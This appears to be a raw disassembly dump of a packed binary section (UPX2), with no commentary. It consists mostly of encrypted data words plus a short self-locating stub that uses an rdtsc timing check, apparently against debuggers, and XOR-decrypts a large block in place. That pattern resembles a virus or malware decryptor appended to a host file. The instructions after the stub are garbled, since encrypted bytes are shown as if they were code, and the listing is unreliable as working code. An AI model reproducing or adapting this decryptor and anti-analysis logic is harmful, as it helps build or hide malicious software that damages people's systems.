0C559FF3Ah dd 8E5F31BCh, 3C8074FAh, 391BFCA0h, 0B89B30ACh, 8186E7ABh dd 0C5F42351h, 8CCE32E2h, 4D4A9379h, 79C59A9Eh, 2AFBCD7Ch dd 0E6B5D34Eh, 0B5AC0B15h, 5E2F0498h, 5D727A91h, 823E9249h dd 0F817606Bh, 0B1D6379Bh, 37D38175h, 396897C5h, 344CF7Fh dd 710FE0B3h, 0FEA48B8Dh, 0F11E5829h, 26DAFEE5h, 1E8B84CFh dd 2A80F629h, 91A3B7D0h, 6A30B3A3h, 0D7289AEBh, 255480B2h dd 9EB6B3F6h, 9BE4AEBFh dd 0F1204F7Eh, 0C246E7C4h, 4F907283h, 0BDEC1B4Ah, 0E9352A8Fh dd 0BA8B5E20h, 0B11D62E1h, 0CDFC2B6Ch, 14346B9Eh, 0AA7ABE0Ah dd 3C4D00D9h, 0D90C0D52h, 55507FAEh, 9BF32BE5h, 8060F8C9h dd 46D4B5BAh, 45A08706h, 1C7806h, 128FFCBEh, 0C589DE7Dh dd 41789FF8h, 0CAC1E312h, 0F15B9AD6h, 793C6BACh, 0AFBB4798h dd 0BC7C0CDDh, 0D3C11E7Eh, 2B74E40Fh, 62747FEEh, 9D4BA638h dd 59B34740h, 0A8D6210Bh, 7196F75Dh, 0BFA4A3E8h, 0CF10C803h dd 850A31CAh, 44722ECh, 0C5C21BF7h, 9386786h, 4CCACAEh dd 0E47889B4h, 65AF559Eh, 0D97BDD4Eh, 0F5313241h, 56D0C911h dd 0D32CE6F7h, 2958A7B6h, 0DD95BEFAh, 2C650566h, 5F2465BAh dd 0F9E92FA0h, 45095EFDh, 0C1B01F78h, 6406392h, 43506356h dd 0BB8476BFh, 58AB495Eh, 237BDF1Fh, 0DC7F1CE6h, 9DFAC38Fh dd 0A1103F6Eh, 75E48AC7h, 510542F4h, 5A760B0Ch, 0C718EAFBh dd 356413C2h, 0C9A3A206h, 236911F2h, 0AB3069B6h, 0FD129E39h dd 0C4FFF27h, 0CDCA13FFh, 11406E9Eh, 7C34B196h, 0A156522Ch dd 39CC3B5Ch, 0BFF575ADh, 394F5CAh, 2860619Dh, 4899BC8Ah dd 3160B986h, 0A4D300h, 0B320A344h, 0CB14C52Fh, 0C8DBF9CEh dd 0B38B2BAFh, 0E1489F56h, 0FA976B9Ah, 67B80A5Bh, 95C4FB22h dd 31794366h, 0E2B3869Bh, 59353A19h, 0A1D40304h, 0E26D4776h dd 0A856330Ah, 7196F761h, 42A9F8E8h, 0CF10F203h, 3D649BCAh dd 0E7A1AA0Eh, 0CF14A0EAh, 3F00F833h, 7ED7CDDAh, 842B45DEh dd 0CD2D8B04h, 21D7D2ACh, 0B94CBBDCh, 3E75F52Dh, 8314754Ah dd 8CDD701Dh, 6D9CFDC2h, 0D7E00F2Eh, 81E4D23Ah, 31AC17C5h dd 45337E00h, 6A961F78h, 0A6B1D59Dh, 0E27891EEh, 72402BF2h dd 7485D8A1h, 1544459Ah, 2DC8B7E6h, 9F9C4B23h, 0D728A2EBh dd 0A0A329B2h, 69AEFF53h, 0ADDC2B3Ah, 0F355C9CEh, 7AE997C6h dd 0E40D5DF8h, 34EC2D72h, 370FEF03h, 0C5DFC5D2h, 8ECDE2EAh dd 827C2BEAh, 0F9EA2F61h, 0AA7B4F9Bh, 0A16D72D1h, 9D0C3B5Ch dd 99367FAEh, 67E1F294h, 2BE2E82h, 681653CAh, 3156B721h dd 0DFA733C2h, 461443AEh, 0AA4EB75h, 77483A4Bh, 8534E312h dd 79FA5256h, 9099E11Ch, 378099E6h, 90387389h, 0D9B83013h dd 5DB3342Ah, 9DBB5744h, 2023FCCDh, 0E92E7FD3h, 2D5D8BBAh dd 3110C48Bh, 8D799648h, 128257B0h, 0BED4FDC5h, 1C15D5CEh dd 0A3F4156Ah, 0A339D73Dh, 75D92E2Dh, 91C0EF28h, 0FA713360h dd 21EDF251h, 5D8CBBDCh, 0BBA5FF2Ah, 601E83C2h, 296EBF29h dd 55386E70h, 51210F08h, 939C3592h, 39D83C47h, 3D1CD3E1h dd 0F96F9A44h, 0F29E63A4h, 7F400253h, 85BCEB1Ah, 0B7105A5Eh dd 1FACF01Ah, 6FB02943h, 2D679D2Ah, 5118D46Fh, 0BBD189FAh dd 0C398F1CEh, 95798ECDh, 0F1204F48h, 40D593D2h, 0C1CEF273h dd 18E6E3C9h, 1066710h, 854708B4h, 3905CEBCh, 3AFC1D65h dd 2778CA1Bh, 7584B3E2h, 28D78226h, 0BB17D01Dh, 2B487616h dd 53AC5D57h, 0AA3CC736h, 0D582EE70h, 9A068F88h, 4A146E2Bh dd 78621770h, 0C29CFE00h, 0EA169FF8h, 0B6BBA2h, 0C9CE1FCBh dd 0A8B99C30h, 528099E6h, 0E1C5F322h, 7C8DC044h, 1D4C4D92h dd 1494BFEEh, 51F424h, 0E918714Eh, 585F8BBAh, 8B2427FBh dd 1E0CECBDh, 0ED7A87Ch, 0B543E4Fh, 81B0DF0Eh, 75F7575Ah dd 8CCFCD5Fh, 4D4A937Fh, 11C0EF1Eh, 0D2B41316h, 21D5F28Ch dd 0BD4DBBDCh, 0A959F234h, 40164356h, 296EBF2Bh, 0ED9F2F3Ah dd 14B0BFAh, 4D42F9E3h, 9C627739h, 7D9AE397h, 4407B428h dd 5025B37h, 4978A7F6h, 84BB86Eh, 0D13617FBh, 354473A2h dd 9E7FBA92h, 9DCCFB29h, 71A03A1Ah, 0AEA76818h, 0C1154C31h dd 86DC3D05h, 0D61C6BFh, 0B06ECB72h, 799EEF9Bh, 1869ECE0h dd 13069B6h, 3174E3D2h, 0D900811Ah, 50792199h, 0FA4059A6h dd 0AA3CD5E8h, 46DFDC6h, 0BB0C0D52h, 84D58805h, 6694F5CAh dd 0DDD90736h, 4899BC09h, 3160B986h, 184D302h, 0BA2FE04Bh dd 892C5B8Ah, 0EBE02FCBh, 4A3F10F9h, 0F638A2DDh, 0C5176BACh dd 627CE757h, 304104EBh, 0D908015Eh, 684CFBAAh, 0FC1532E0h dd 2FD4350Ah, 1098077Eh, 0A0A4F8B9h, 55E402FAh, 55251352h dd 52A3E78Eh, 850A9D29h, 2AD61F3Fh, 457B9B34h, 938DFFEh dd 2B9DA9DAh, 146BB7B5h, 0B30246ABh, 7F88461Eh, 0F74F0B41h dd 99607AA3h, 60E34344h, 296EBF13h, 7D9CCBFAh, 9AB7094Bh dd 0ECCF0B7Ah, 1240C44Dh, 0F67CF0F2h, 0F7CFD7C3h, 0ADA16292h dd 487891E9h, 0A9F86023h, 0B6BDA65Ah, 9E4445B2h, 6FB71B5Bh dd 3549D02Ah, 16100951h, 136C2637h, 699887F6h, 5ADE7F3Ah dd 0F5E2E4A6h, 0B633C5C2h, 4F9737BBh, 39E31B4Ah, 1305E57h dd 4574AE3Ah, 0DBFDAC16h, 0FEB06E14h, 5D0441ACh, 0C07BB3AEh dd 99FECCB4h, 0E2F8BEE3h, 0AA037F98h, 0BD97FFAAh, 22F074C9h dd 0DF47F39h, 0BA9F704Bh, 439B0797h, 0FBEB4C46h, 5A9D286h dd 4270A9F1h, 3DEB50h, 0C9CE18AAh, 0F2141811h, 51802F6Dh dd 607D1B22h, 6483C899h, 1D7A447Eh, 943D57B8h, 305FFCCDh dd 0E92E78A2h, 2E54C131h, 0BF8BC3B4h, 0BAE1FAC1h, 0F929370Eh dd 67E894CAh, 82B0DF0Fh, 0F3CBFBE7h, 918D6496h, 0E17C9DE5h dd 14CF0722h, 0D50433C0h, 324C312Bh, 6BB3236Fh, 0F1D6FC2Eh dd 1AE1299Ah, 0FDE50449h, 6D9CFDC5h, 0F6DB044Bh, 0EEA75C8Eh dd 0D26897C7h, 0A939E206h, 0CEF02971h, 5356E17h, 0D1FDA4D6h dd 0EBBCDD25h, 0F4FF17DFh, 15B8F6ADh, 1903B7E6h, 0A98FD028h dd 143DD73Eh, 986D7C4Dh, 69AEF822h, 0AD388E35h, 74234F7Eh dd 3552AC1Ah, 46305205h, 0BD671B7Ch, 0E3C18A5h, 45746E50h dd 81FFDC16h, 0CD38A855h, 0D1C36F9Eh, 41C3B0E0h, 0A6507225h dd 8D5E3B5Ch, 1EA4CA51h, 0F06BC3C4h, 0A9EE3C64h, 0E2DCCE20h dd 3160383Bh, 75383A02h, 46D41746h, 0FDB8DE85h, 7FF09FCEh dd 0E31EC07h, 42F82756h, 4E176ADCh, 0ED68FFEAh, 0AC3B0CD6h dd 0EF37E3DBh, 1E3B0EAAh, 57AF676Bh, 3D510032h, 60187149h dd 1B1C8B3Fh, 4AA044FEh, 83DBEBC7h, 0C2202586h, 0B53674Fh dd 0BCD9AD0Eh, 0B5F42352h, 16D050E4h, 0C07CABDAh, 504B1350h dd 97073149h, 19CD4CB6h, 288C8DAAh, 0B1147C22h, 0A19B728Dh dd 0C2399B92h, 0E81308E1h, 0B1D63086h, 6D91D8E2h, 0D168A1F9h dd 82532E50h, 0C1F0B62Fh, 0B41E392h, 3B74E0FDh, 85FBD013h dd 2E3CAD51h, 1A0D8C5Dh, 0A6760563h, 0B9F070D5h, 0C9B598EFh dd 0DAAB83B2h, 2B73B809h, 0CDF841BBh, 0BFC04F7Eh, 39EF53F1h dd 992D5022h, 34EC2D75h, 370F830Bh, 0ECCD2ED2h, 8AB8E73Eh dd 0FBC3B3DFh, 0B4E5099Eh, 564298ACh, 0DBE3E364h, 264AFD66h dd 73D1B846h, 6094C3F2h, 20D80736h, 0B343B73Ch, 0A49FD87Dh dd 7592E89Ch, 0B6F7FF87h, 0FD2D410Fh, 2B24CFCEh, 7A4B893Ah dd 0FFC3D9C3h, 52FCEE9Ah, 508527D1h, 0D52CF322h, 31F7C883h dd 1D4C7BBBh, 27E4DABDh, 0F6B16F5Bh, 9B6D2413h, 6C25FFD3h dd 1D1530FEh, 4AE4257Dh, 0CF130513h, 49E912CAh, 69B0E931h dd 0C5F4234Bh, 686C02C5h, 3A33CEB1h, 0E2B28A70h, 85745A0Ah dd 703E1ED4h, 38EBDE86h, 0B038A82Eh, 0DEBBC9Bh, 295887A5h dd 8CEAEA9h, 0C38F7B4Dh, 9C5603E7h, 5C04FEB0h, 2AACBE6Dh dd 3E18ECA6h, 5268B6Dh, 2C2BA7D6h, 0E6DF8A58h, 0A3505F2Bh dd 792D05CBh, 59EDD083h, 751A137Dh, 0F9F8C091h, 765483B2h dd 8F08493h, 0E3B96C54h dd 97493B11h, 5C16C3BBh, 1CC4BE70h, 0EAEC7E2Dh, 0FED8EC66h dd 0C820F32Dh, 0BF825793h, 9D98415Ah, 0EE176EF4h, 63B8B977h dd 0BDF47E26h, 0E64AAE95h, 0E17A7F98h, 5BFC7E7Fh, 0F9880700h dd 5DA9B42Ah, 5960B984h, 75A0D303h, 0EEE97D12h, 0C258CE75h dd 2B249FF8h, 104BB416h, 0C9CE1822h, 0F228AF19h, 67BFC36Bh dd 17510C22h, 8608015Dh, 75F9F669h, 379089D0h, 9E5296CDh dd 119B4740h, 96D88445h, 0F8A0CFFEh, 83DB6BC7h, 0AF283D86h dd 6AE0E35h, 4135DF38h, 0C550A75Dh, 0C9136796h, 4E16FB8Ah dd 0F9C1854Eh, 15043362h, 7BDD88F0h, 0DE8C8DD1h, 25DF00D6h dd 0E514469Ah, 1624023Fh, 0E011CBCCh, 0B1D630BEh, 0CAACC60Fh dd 6B3997F0h, 82FCDB60h, 0F7CB91DBh, 0FACCE092h, 4CCE23D9h dd 8DD6EB1Ah, 0EE7C9AA1h, 80BB7394h, 59BE8C6Ch, 923303A9h dd 0E115A0EAh, 0B5D10AB2h, 5A98F1C9h, 0FC1F08F3h, 0F54A1E2Eh dd 49D16C93h, 86A8E139h, 8BD77DDFh, 0EF0DA8Eh, 4571D856h dd 71D416h, 0FBC3BFDFh, 40113E9Eh, 5A84AC8Ah, 0C37A726h dd 0DD3A00C4h, 0A55FBF2Bh, 6594C6C6h, 964082BFh, 55DF4B4Ch dd 3160FFB6h, 829C9889h, 8FD0B2C3h, 0FD2C5B8Ah, 4276EADEh dd 0B3A48497h, 0CA2A1456h, 0FACD9C5Bh, 0F505263Fh, 2DC4C51Dh dd 0D9081FC9h, 1E703021h, 5780D86Bh, 0A6063032h, 1EE9B0B7h dd 0B1D9025Bh, 0B2A0F9C1h, 0B3AFA44Dh, 741DB47Fh, 8A638399h dd 51B3CB4Dh, 0ED35481Bh, 33B9B795h, 2315DC85h, 12DD9BE7h dd 0A7053F18h, 2503FC46h, 5E98F961h, 0E55DEF6Ch, 3CE3BC3Ah dd 0AC634695h, 6DAAF46Ah, 95B484FDh, 7AE46092h, 39682F44h dd 0B227180Ah, 7C7D14A5h, 5025DFAh, 7AA72C2Ah, 0EC8047D3h dd 0AB3C292Ch, 356871D5h, 2DD48B4Ch, 0E9E2C7C6h, 941003B3h dd 0AE9D605Ah, 31DDFAF7h, 0A6A80B7Fh, 0A3631C43h, 6E19CC2h dd 0F25728F9h, 0F4BB2649h, 853F1CC0h, 0BA8B5CF4h, 0DCFBB02Bh dd 0D6782414h, 2CBF9061h, 67B7F0B5h, 66D87329h, 8D31C495h dd 2E1F2BFDh, 9A6BC676h, 410334C9h, 12E3B557h, 0CB889FCBh dd 9D5B2CFEh, 4617E967h, 3C0DF85h, 93436031h, 85B4F5FAh dd 369BCF56h, 0DD49465h, 0C80AFDEh, 0A6971EA3h, 2E13750h dd 794C7BA9h, 0D41B8D11h, 0A5E23CAAh, 8F3ACE12h, 7711B53Bh dd 72644AF1h, 0EB6F1342h, 9FF654BAh, 783CA04Bh, 82045A01h dd 86032352h, 9186780h, 0EAF9A4DAh, 67C0EF1Dh, 0DA066F21h dd 194BEA22h, 55CF30EAh, 1705F13h, 6A904CD2h, 145887B5h dd 4DBCEBDAh, 0B2648B31h, 4CCC5382h, 36976838h, 7DAFA288h dd 1D559C4Eh, 53455ADh, 0C270E55Dh, 4C97FB50h, 11332B2Dh dd 0DD477649h, 0D098FD6Fh, 0ABF35BAFh, 0ED5A3C6Eh, 2454830Ah dd 0F97096F6h, 9D23F4DDh, 0C718ECEBh, 54422C2h, 4F9073B3h dd 43CC714Ah, 15480747h, 0BA93D53Ah, 866A62E9h, 2F2FE9CEh dd 29E5FAAFh, 0B06FB3D4h, 0A16D72D1h, 0DD0C3B5Ch, 3247EAEh dd 5D314605h, 0A9DB0700h, 0E1694B7Ah, 9C52A3Fh, 8A5BD334h dd 0B303ECB9h, 0C589D60Bh, 41709FF8h, 83DCEB12h, 90F82756h dd 0D3C6DF2h, 7968F7DEh, 1F3B0CC5h, 0EF30AAE3h, 37C8FDAAh dd 61A68773h, 9D4986BAh, 9FA4740h, 15F90E4Dh, 71A8CFC8h dd 0BC911342h, 0C1B7EA06h, 496D9BFCh, 243528CBh, 0C5F4156Ah dd 7D306796h, 0D0C12BC1h, 94C0D926h, 68848316h, 197E4F38h dd 0DD2BCFEFh, 97E86093h, 7B604672h, 11FD0241h, 6D9CCBCCh dd 0B8948F3Eh, 0CDB9EE02h, 4E6A97F0h, 9D095883h, 0C1F02971h dd 0FAC7647Ah, 0B4194F29h, 0FD5414E5h, 5A002F5Ch, 237BEF3Fh dd 0F915B4E6h, 75CCCD15h, 1EEFC317h, 270407BDh, 0DC13C7F6h dd 0ADEA34A2h, 0F21C11F5h, 0C81E7B1Ch, 0FBA728F9h, 0BDEC1970h dd 6114150Fh, 0CE94A3D2h, 8AEEB5E8h, 0B7FF3F20h, 0B4C5988Eh dd 558485DAh, 0ECD8F726h, 39B1B27Eh, 0AC504991h, 53AC7347h dd 0CE558C36h, 1E1C7D6Ah, 1DD9D81Ah, 0F8A4D308h, 8FF817F3h dd 4C89A88Ah, 0B2727CCEh, 203114B6h, 0C9F8116Eh, 22C6B9Ah dd 5180015Ah, 0BDB70C22h, 26E6818Eh, 0C9D9F055h, 0E49089D1h dd 3D500CE0h, 62184776h, 1B63130Fh, 61EA44FEh, 0D5C059C3h dd 0D2C85786h, 3F1F9380h, 0F3B3163Dh, 0A2791846h, 82385186h dd 7B6CCC57h, 1A969D1Eh, 7087175Eh, 197E67C1h, 3A2B38EAh dd 0A1D0FF2Eh, 0E41C39F9h, 0DE5B8FFCh, 0E8173C7Dh, 0B1D63092h dd 0CD81D675h, 392897F0h, 7FD8DB0Ah, 0B3F307B9h, 8C044A9Eh dd 7F474763h, 0A5CF601Ah, 54F71F5Fh, 15724B07h, 5988B7A6h dd 853BF95Eh, 1D59D73Fh, 0CE0D7C4Dh, 41EBC4FAh, 0FCD07911h dd 0AE84BC28h, 85D11E9Bh, 0F0A8E13Eh, 8BD3FFF7h, 5E94AC8Eh dd 0D745AC8Ch, 896B609Bh, 58C62B5Ah, 1176573Dh, 87EDB597h dd 8BFCA15Eh, 35FC6BE2h, 0DEAFA50Eh, 69DE48A8h, 5EC84D35h dd 0DB24EEFFh, 31608FBEh, 70E55E12h, 34610433h, 0FD1A646Ah dd 51171ACDh, 2237E324h, 0C9F82731h, 257F409Ah, 51D22857h dd 1033F322h, 0D93E0B06h, 1D4C7BABh, 2257B89Ah, 574A33Ah dd 4C9DB0D6h, 2D5CBD82h, 520CFFEh, 0CF0C4145h, 0A3D7A871h dd 28C1641h, 8453DF38h, 2EDC68DBh, 0D5B5EC9Bh, 0AE7C9DE5h dd 1AC3041Ch, 50F31B29h, 197E4F03h, 5D8CBBE9h, 245BEB5Ah dd 0E5227C96h, 16880AB5h, 0E89FCBCCh, 0B1D630F2h, 0BFAF5B83h dd 0A5ED1CD6h, 44ACED35h, 0C2831704h, 43C291Bh, 2AFBB794h dd 837EB42h, 0D13610FAh, 156CC3CAh, 51CAB6E6h, 0CD8FFA73h dd 0D9B3AAE4h, 0A0A38384h, 69AEFF53h, 0BDDC0B3Ah, 7C23490Ah dd 355283A5h, 0FC5FD7B0h, 0BDDA23EFh, 1325F8Eh, 838AB7A7h dd 0B11D62E1h, 0CDFC2B6Ch, 17356F9Ah, 6D200668h, 1C3FF710h dd 0DD3A03CFh, 21503FAEh, 621EC887h, 0AB72C534h, 6EBA9ACh dd 36705B7h, 0A3A679C0h, 6BDBE0A4h, 990ED0EEh, 0C2289D41h dd 0B38B9FAFh, 4DF72756h, 0F2C39144h, 6E181A21h, 3BF314h dd 0D93E0CB4h, 22D8CE55h, 0F46FBFD8h, 0A5E23874h, 0D698CAFBh dd 0B8D18B8Ch, 7196F076h, 0B58E4113h, 0C654E279h, 0A8939BFCh dd 8186E4C8h, 0FA8896ADh, 9CC767A0h, 4D4A909Ch, 0AFA85A93h dd 60FB3354h, 197E48DEh, 9F1944BCh, 22D0C915h, 0D32B3FD7h dd 0C19B87B6h, 6D9CCBFAh, 30E16563h, 0C313E36Fh, 3698CFC6h dd 68D85ECBh, 1751F78h, 0FAFCE051h, 0CCB9A826h, 8D8AFE6Eh dd 0D110129Dh, 9317388h, 7DF43680h, 0E8BD9726h, 25F85F7Dh dd 50AB7C4Dh, 934C2FF3h, 7F34F4C5h, 90DFB081h, 4D496CECh dd 0C1BAE350h, 0BDEC1B6Fh, 0FE95B7EEh, 7C015C2Dh, 0B99CA39Dh dd 0F3949ED7h, 41CB6FA8h, 6F05D5EAh, 0BCBBF520h, 0DD0C533Ch dd 0E5DB7F51h, 35C6C398h, 95CA92C9h, 299F4B4Ch, 6D5E0EB6h dd 0F8EC3Dh, 0BD2E9445h, 2D6DA62h, 0BE0F7731h, 46D51CEDh dd 0C9F853EEh, 0B58D809Ah, 5180AFF1h, 95C4EECAh, 0D928F566h dd 1D4C4B12h, 618057EEh, 81160332h, 0E89DFF76h, 2EB48BBAh dd 0B3A0CFFEh, 0E169136Eh, 0D7E55BA2h, 416C6349h, 8158BF17h dd 4EF42352h, 540843C2h, 0A0FDB151h, 91F6D799h, 2AE5898Ah dd 1D8A1659h, 5F8BB8EAh, 90D5F92Fh, 0BD128E3Ch, 4415FF7Eh dd 90004412h, 0AE8h, 96E800h, 3FE90000h, 67000000h, 36FF64h dd 4F250100h, 67314420h, 268964h, 68C03100h, 80000000h dd 68h, 6880h, 20688000h, 68000000h, 1, 200068h dd 685000h, 50000001h, 808C15FFh, 0BC3143h, 64000000h dd 58Fh, 295E0000h, 8C8FEC0h, 750474C0h, 0E867EBF8h, 30h dd 0FFBFEB81h, 0D229FFFFh, 28B0F281h, 83BE0000h, 53000000h dd 2966038Ah, 88FCFCF0h, 0FCFCFC03h, 4601C383h, 0FA834Ah dd 0FF5BEA75h, 909090E3h, 90E3FF5Bh, 1024448Bh, 0B8808Fh dd 1A4h dup(0) dd offset loc_3144A000 dd 1405h dup(0) ; --------------------------------------------------------------------------- call $+5 mov eax, [esp] cld mov [eax+2FE3h], ebx test dword ptr [eax+28A0h], 80000000h mov ebx, [esp+4] jz short loc_3145204B pop ecx mov [eax+2FE7h], esi mov [eax+2FEBh], edi cmp byte ptr [eax+28A4h], 0E8h jnz short loc_31452042 add ebx, [eax+28A5h] mov ebx, [ebx+2] push dword ptr [ebx] jmp short loc_3145204A ; --------------------------------------------------------------------------- loc_31452042: ; CODE XREF: UPX2:31452033j mov ebx, [eax+28A6h] push dword ptr [ebx] loc_3145204A: ; CODE XREF: UPX2:31452040j pop ebx loc_3145204B: ; CODE XREF: UPX2:3145201Dj push ebp mov ebp, eax sub dword ptr [esp+4], 10005h sub ebp, 361005h mov edi, [esp+4] lea esi, [ebp+3638B0h] ; CODE XREF: UPX2:314520DAj mov ecx, 0A9h rep movsb call sub_314520C0 mov ecx, eax call sub_314520C0 sub eax, ecx jz short loc_31452094 cmp eax, 100h ja short loc_31452094 lea eax, [ebp+3610D3h] mov dl, [eax-10h] call sub_314520C4 jmp short loc_314520D3 ; --------------------------------------------------------------------------- loc_31452094: ; CODE XREF: UPX2:3145207Bj ; UPX2:31452082j test dword ptr [ebp+3638A5h], 80000000h jz short loc_314520BE lea esi, [ebp+3638A9h] mov edi, [esp+4] movsb movsd mov esi, [ebp+363FECh] mov edi, [ebp+363FF0h] mov ebx, [ebp+363FE8h] loc_314520BE: ; CODE XREF: UPX2:3145209Ej pop ebp retn ; =============== S U B R O U T I N E ======================================= sub_314520C0 proc near ; CODE XREF: UPX2:3145206Dp ; UPX2:31452074p rdtsc retn sub_314520C0 endp ; --------------------------------------------------------------------------- db 33h ; =============== S U B R O U T I N E ======================================= sub_314520C4 proc near ; CODE XREF: UPX2:3145208Dp mov dh, dl mov ecx, 27D2h loc_314520CB: ; CODE XREF: sub_314520C4+Cj xor [eax], dl inc eax add dl, dh loop loc_314520CB retn sub_314520C4 endp ; --------------------------------------------------------------------------- loc_314520D3: ; CODE XREF: UPX2:31452092j mov dl, 85h cdq cmp al, 0 int 0E4h ; used by BASIC while in interpreter jecxz short near ptr loc_31452060+1 stosb pop ecx or eax, 0B1F5BEE4h mov [esi+172FFCC8h], dl jp short loc_3145212E cmp ds:7BA1A822h, ch adc eax, 15B3D630h loc_314520F6: ; CODE XREF: UPX2:3145211Cj cmpsd pminsw mm0, mm6 sub esp, [eax-42B04ED4h] xor bl, [esi+63h] xchg eax, edx pop ebx sub bl, [edi+2A8D43E9h] das fidiv word ptr [ebp+edi*8-5077DD5Ah] nop db 67h cmp eax, 0CF10BAF8h add esi, edx jge short loc_314520F6 sub [ebx+1], dh iret ; --------------------------------------------------------------------------- dw 7AD4h dd 58B37A55h, 0C1031B26h db 0F2h, 22h ; --------------------------------------------------------------------------- loc_3145212E: ; CODE XREF: UPX2:314520E9j scasd or al, 8Eh push 23h mov al, ds:1FECB56Eh push edx mov ah, 84h insd xor al, 0CCh setalc test [ecx+3Ch], bh out 0B6h, al ; Interrupt Controller #2, 8259A mov edx, 300B99E3h scasb and [eax-7Fh], bh pop esp jmp far ptr 7C94h:0F0804D1Ah ; --------------------------------------------------------------------------- dw 0B2Dh ; --------------------------------------------------------------------------- xlat mov al, ds:0C5102E6Eh movsd pop ss sbb [edx+3936A66h], eax inc edi loc_31452167: ; CODE XREF: UPX2:31452168j cdq loop loc_31452167 inc ebp ; --------------------------------------------------------------------------- db 7Bh dd 2253E1AEh, 6081E10Eh, 0ADDE3C32h, 0F878377Dh, 0F2CDC721h dd 4326E6E4h, 0FDF6A9Eh, 0D468F042h, 588B428Ah, 0E6BF5D25h dd 3F3AE2E8h, 8ED765F7h, 0D7A472BFh, 0B65C808Ah, 1A3D09E0h dd 0D3BD2AB6h, 0F9D49751h, 0E5B541B7h, 1BE9B606h, 803833C7h dd 0B3A15299h, 3D0AB7Fh, 0DAE8CCB5h, 18683534h, 5121796Bh dd 9683CD9Ah, 0FFFA8C1Ah, 4E5E3232h, 9752232Fh, 318574CBh dd 0A2FCFFADh, 0CDDD65D7h, 4A5D522Eh, 0A55B7347h, 0B70C48C6h dd 2BF8C61Eh, 69516E01h, 2906B11h, 0B53361Eh, 5B28F516h dd 4DE08605h, 9B038E1Ah, 0B78C4926h, 0B00EA07Bh, 5E4CF188h dd 49F0BDFAh, 39297656h, 3E886319h, 69D02E2Eh, 0C420EDB8h dd 0FEC0C0Bh, 4338564h, 0B78852A7h, 83BD9CEAh, 0C21CDFA6h dd 2DFAE417h, 1811724Eh, 936CCEF8h, 7726E56Dh, 0C6412581h dd 21FF88EBh, 681B8E4Ah, 0BF2BC0EAh, 2C54521Ch, 4614E2C6h dd 4575527Ah, 5CAC4F7Dh, 6BFD65D6h, 75DB95D1h, 2987DDAAh dd 67DDC376h, 5BA87142h, 0A6744166h, 25D5F2DAh, 0BA0CEF9Dh dd 895CAAB2h, 0BDA4713Ch, 0A3186D0Ah, 53C0DD6h, 37E014A2h dd 57D5CB39h, 0D2A06C52h, 0C9F9C606h, 33833E9h, 3705D194h dd 38860895h, 0CA746900h, 72683502h, 6734039Fh, 0D059CDF0h dd 0C6F36Ch, 0FDA3AFA7h, 5495DAFEh, 58464049h, 20FCC9A0h dd 0FBCAA1E6h, 0C792892Eh, 0C72E2DFAh, 5F60B582h, 106A506Dh dd 42499168h, 0C3A64AE0h, 32D1E0C5h, 5B1ECE1Ch, 0CF67CF3Fh dd 0F3C08F2Eh, 839EE4A5h, 845825C4h, 5726F13Ah, 0C175368Ah dd 10BCBF6Dh, 3E075452h, 87621612h, 68DA6831h, 6F13B9B0h dd 0A23D0A53h, 3C846726h, 0B56BFB6Fh, 4E6C16B6h, 23B8300Dh dd 6A3F8178h, 0B3B676F0h, 0EB30305h, 169D6AB3h, 9CE48746h dd 0D58B8FC7h, 5075AA16h, 0FEC71493h, 4722D9C4h, 13E11592h dd 0B711F446h, 2078732Eh, 81447B11h, 47602273h, 65DF48F5h dd 8C517602h, 0BF1E4164h, 6697B857h, 26B5D990h, 86D8A572h dd 285A3C3Ah, 816C2F5h, 6F710D5Bh, 5D08D5A2h, 3932CC5h dd 5E445F91h, 0A9572D93h, 0E25EA9D2h, 0B4AFB79Ch, 0F6329FA8h dd 0CFF6BDBDh, 9B183C6Ah, 0DF88ACEh, 59C4469Ah, 0FFCCF166h dd 8BF26D32h, 990E63AFh, 8DA5029Ah, 77FCFFADh, 938851E1h dd 0C7941127h, 930AF971h, 1F46354Dh, 2992C5F8h, 9FC4FB0Ch dd 0C3902D23h, 0E50D299Ch, 0CED7A53Dh, 27C2FA78h, 0C45D405h dd 0BE8BDD29h, 3ED525F2h, 5712E1BEh, 23FCBE33h, 1C530256h dd 0BB65D487h, 0A5417FEh, 6534DA3Fh, 4F0C4686h, 8198EF06h dd 4911AEE1h, 6502BD1h, 7B69B676h, 1BE9FB6Ah, 0E7A5694Eh dd 0D6D34D1Ah, 0A2E7CA2h, 226AB5D5h, 7288D808h, 0B4B0182Dh dd 0AF7906FEh, 17FDEAE2h, 0B814D791h, 25DB2FEFh, 4A532E46h dd 0AB4E7E54h, 752E11B4h, 78664855h, 2765A940h, 4CA87543h dd 0ABFDA025h, 8C1759FEh, 9376333h, 882E9672h, 0E198279Bh dd 0F4243D0Ah, 54829C29h, 0FB8DD594h, 8492C71Ah, 3DD269C4h dd 97484DF9h, 415205B8h, 0CB24461h, 0C3559D5Ch, 270FB542h dd 9B683085h, 84A5C8FDh, 6585F4A0h, 8ACCAF5Ah, 0EFE4E400h dd 0E51752DAh, 0E21889B9h, 2FF25457h, 0AB9CC562h, 97C43078h dd 0FDF5D2A9h, 0DA2CCFFDh, 248C9C52h, 0FFE0E5A1h, 0FFC6D8A5h dd 4AB429C0h, 8D70A3Fh, 1CB25471h, 7D2B8D6Ch, 0BEA49DA7h dd 740F25F2h, 611FB72Bh, 6565428Ah, 6BCBF6Dh, 4477AE4Ah dd 873E7BEEh, 534AEDD0h, 1E84B9ECh, 60B88152h, 0E7843BDAh dd 47DB1180h, 374A0B49h, 1BE881DDh, 3D5C487Dh, 3E7FB2E5h dd 49595F73h, 1A49B7B2h, 5D714E2Eh, 60B04B71h, 3FBF69D2h dd 7B104DBAh, 4714D1A7h, 13E0A312h, 0DFAC7947h, 0AB784512h dd 774411DEh, 4310F50Fh, 0FDCA976h, 24FB2313h, 914F139Bh dd 0DF19A6DAh, 0C4791922h, 861B4B90h, 0E1BD00ABh, 368F6F0Ah dd 6F0A327Ch, 464502Bh, 113CA158h, 9FA06D3Ah, 0EA075669h dd 24A55A2h, 5268B8E8h, 6286F80Dh, 8EF91C5Ah, 0E976502h dd 67023A9Ch, 0C704813h, 0A30F9950h, 0AEEB0470h, 0F20950B0h dd 952B2AEh, 5C88AAF3h, 0A8BCC33Eh, 0C7E0024Bh, 0E1145E96h dd 5F429CAAh, 4A9DB7D1h, 9E82F42Ah, 0C3D13846h, 0EE395BB5h dd 326E90B6h, 46B9A4E2h, 9DA9FD2Ah, 0FC8C1841h, 0FF394080h dd 3856A1DBh, 5083D8E9h, 9DFF8917h, 0DEFC3447h, 0E83944BCh dd 3B7488CEh, 7B8DDCF4h, 8ECAC652h, 0E3E1257Fh, 0E2356F82h dd 3D5FE9D2h, 7E9CD4E7h, 